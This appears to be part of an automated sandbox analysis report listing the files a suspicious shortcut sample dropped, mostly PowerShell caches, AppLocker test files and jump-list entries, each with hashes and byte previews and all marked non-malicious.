                                                                                                                                          SSDEEP:3:edYeYvlekGuAJkhvekl1HMH1oZ08llrekGltll/SPj:WzgltrxleVE00Je3l
                                                                                                                                          MD5:C7CB6C4210849F3B815831554431E8F0
                                                                                                                                          SHA1:8BA252ABE62B6F69EB0C00BBD951448AEE9939F9
                                                                                                                                          SHA-256:1FAFB7B960C31A4BFE2D246D950974F83CCAEDAA45C7FDDE54B414A4ECD9BFBA
                                                                                                                                          SHA-512:93163610BE190520D6C3E0EE211AC31674E266987BE20BF1C3F47EEA096C7C3111DFE64CFF758FB035819F252938DFD159707F955F37FA121B8CA2B648655B38
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:#........................................;...{...:...|.......{...............{.......{...XL......{....................i.:...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):11608
                                                                                                                                          Entropy (8bit):4.890472898059848
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                                                                                          MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                                                                                          SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                                                                                          SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                                                                                          SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):3092
                                                                                                                                          Entropy (8bit):5.5109511240626246
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:xEAzlHJTF9qrfIfl7KCDpuvJ5Eo9AdrxQgP:z1VarfPCluvLL2NP
                                                                                                                                          MD5:627897106459C76FCA0051E062EA4A85
                                                                                                                                          SHA1:BF5D99E1C887DF5FD128B29B6A853C46AF09B9D6
                                                                                                                                          SHA-256:76DAEAFB6ACF089A472A27A557979AB7966BB3EA1BD7F66C17BA34874CD70B93
                                                                                                                                          SHA-512:B32441F249791A325FB6082F7141ED3BB40CA07CB4AA91D78B23EB6D976C7E0B85F7249F30F9F0597EB115E5850213B4A9133DB5515D78C5FA8C14D8241903D3
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:@...e................................................@..........H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation4.................%...K... ...........System.Xml..<...............i..VdqF...|...........System.Configuration4.................0..~.J.R...L........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1324
                                                                                                                                          Entropy (8bit):5.400762516472989
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:3ISKco4KmZjKbmuuod6emN1s4RPQoUxqr9t7J0gt/NKCpnd+9N9iagTNk:4SU4xymdojms4RIoUxqr9tK8NLpk9N9b
                                                                                                                                          MD5:D056062CB4E8D9E5A715BE1511ADC47A
                                                                                                                                          SHA1:1B7ED38789BC05D882362CC75963EE4A01734D09
                                                                                                                                          SHA-256:55C1D68882E0690D600EB27D5E696A7723A430AE7F1F54833019B283ACD098F1
                                                                                                                                          SHA-512:2CA63EA9EB32A3ACF07D09997290C80E0B7D6827DAD0E453A3BBBB54653589256AFB0D11135474E097E5D9EC9EB4E61DF691AFB68046C2F45C6B1ABE62FCEA21
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:@...e................................................@..........@...............M6.]..O....PI.&........System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0qtfngby.swe.psm1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0sj44sff.et5.ps1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2otiuygk.unc.psm1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2rjq3dxb.gjo.psm1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2wzhbj4r.eus.ps1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55sq5g0h.ryw.psm1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a5rnxymq.kiy.ps1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b5t1xczo.3np.psm1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bpn5ovvh.dxr.ps1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_govtqkk0.2fn.ps1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_izswjccv.sm4.psm1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j4pwkcub.f0y.ps1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_na1xsmoe.v43.psm1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z2yjwqbr.54z.psm1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zantpa52.wxd.ps1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zen2zgz5.kaw.ps1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RVWKF035IDWLR3KZJ7RZ.temp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):4589
                                                                                                                                          Entropy (8bit):3.7741974933535727
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:7NGM9a/KRfkHBkElzVSogZo6EHBkElIVSogZou1:7Nn9EHBkEyH8HBkE3H5
                                                                                                                                          MD5:55CAA580BFF30D7A572B9956E86B2A2F
                                                                                                                                          SHA1:84789CF6189DFF6718ABEFB851221A03D7C8683B
                                                                                                                                          SHA-256:3AD701C33A8C0ABDDEA27811481A58EAB6060CB1E4320DA5C653678A7CB5096E
                                                                                                                                          SHA-512:7F0DD72AD13DF19D44919A30DA65CEC9E18C39342F533C0EC5856CFB519BDB611B820975F9FC207729D793C8B5F042E86B80CE2FD3A45A89734F9254708F0AAF
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:...................................FL..................F. .. ....qwr....ot..Y....:..Y..."............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......O....../!Mt........Y.....j.2."...>YD. .SV6EQZ~1.LNK..N......DW"r>YD...........................nU..S.v.6.e.Q.Z.z.G.0.Z...l.n.k.......U...............-.......T.............\......C:\Users\user\Desktop\Sv6eQZzG0Z.lnk..3.%.P.r.o.g.r.a.m.F.i.l.e.s.%.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.`.......X.......302494...........hT..CrF.f4... .Zy2=.b...,...W..hT..CrF.f4... .Zy2=.b...,...W.........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z.....3........"KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....DW#r..Windows.@......OwH>YB.....3......................"..W.i.n.d.o.w.s.....Z.1.....>Y@...System32..B...

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\cb777a0bab8c1b33.customDestinations-ms (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):4589
                                                                                                                                          Entropy (8bit):3.7741974933535727
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:7NGM9a/KRfkHBkElzVSogZo6EHBkElIVSogZou1:7Nn9EHBkEyH8HBkE3H5
                                                                                                                                          MD5:55CAA580BFF30D7A572B9956E86B2A2F
                                                                                                                                          SHA1:84789CF6189DFF6718ABEFB851221A03D7C8683B
                                                                                                                                          SHA-256:3AD701C33A8C0ABDDEA27811481A58EAB6060CB1E4320DA5C653678A7CB5096E
                                                                                                                                          SHA-512:7F0DD72AD13DF19D44919A30DA65CEC9E18C39342F533C0EC5856CFB519BDB611B820975F9FC207729D793C8B5F042E86B80CE2FD3A45A89734F9254708F0AAF
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:...................................FL..................F. .. ....qwr....ot..Y....:..Y..."............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......O....../!Mt........Y.....j.2."...>YD. .SV6EQZ~1.LNK..N......DW"r>YD...........................nU..S.v.6.e.Q.Z.z.G.0.Z...l.n.k.......U...............-.......T.............\......C:\Users\user\Desktop\Sv6eQZzG0Z.lnk..3.%.P.r.o.g.r.a.m.F.i.l.e.s.%.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.`.......X.......302494...........hT..CrF.f4... .Zy2=.b...,...W..hT..CrF.f4... .Zy2=.b...,...W.........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z.....3........"KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....DW#r..Windows.@......OwH>YB.....3......................"..W.i.n.d.o.w.s.....Z.1.....>Y@...System32..B...

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 15:58:12 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2677
                                                                                                                                          Entropy (8bit):3.975693364254317
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:85dQTUsMHxidAKZdA19ehwiZUklqehry+3:8kvmky
                                                                                                                                          MD5:974056D86AAF99F242420E9AC21F80B6
                                                                                                                                          SHA1:ABD9995C870CD008E9DF6354456DBE70294C62A4
                                                                                                                                          SHA-256:D33D6FE758DA7FBDA4AB3A57274D3CA9D909EB39C76F5E0C3D2733D63936993D
                                                                                                                                          SHA-512:C39A0962D0376E9B7449991C38144E248B1A6D585EC57E90DB3A53751C160AF4EA13A60CF4B9B56E730FE91FFE6911AF7E00C7C7007CD074484C89161F06483F
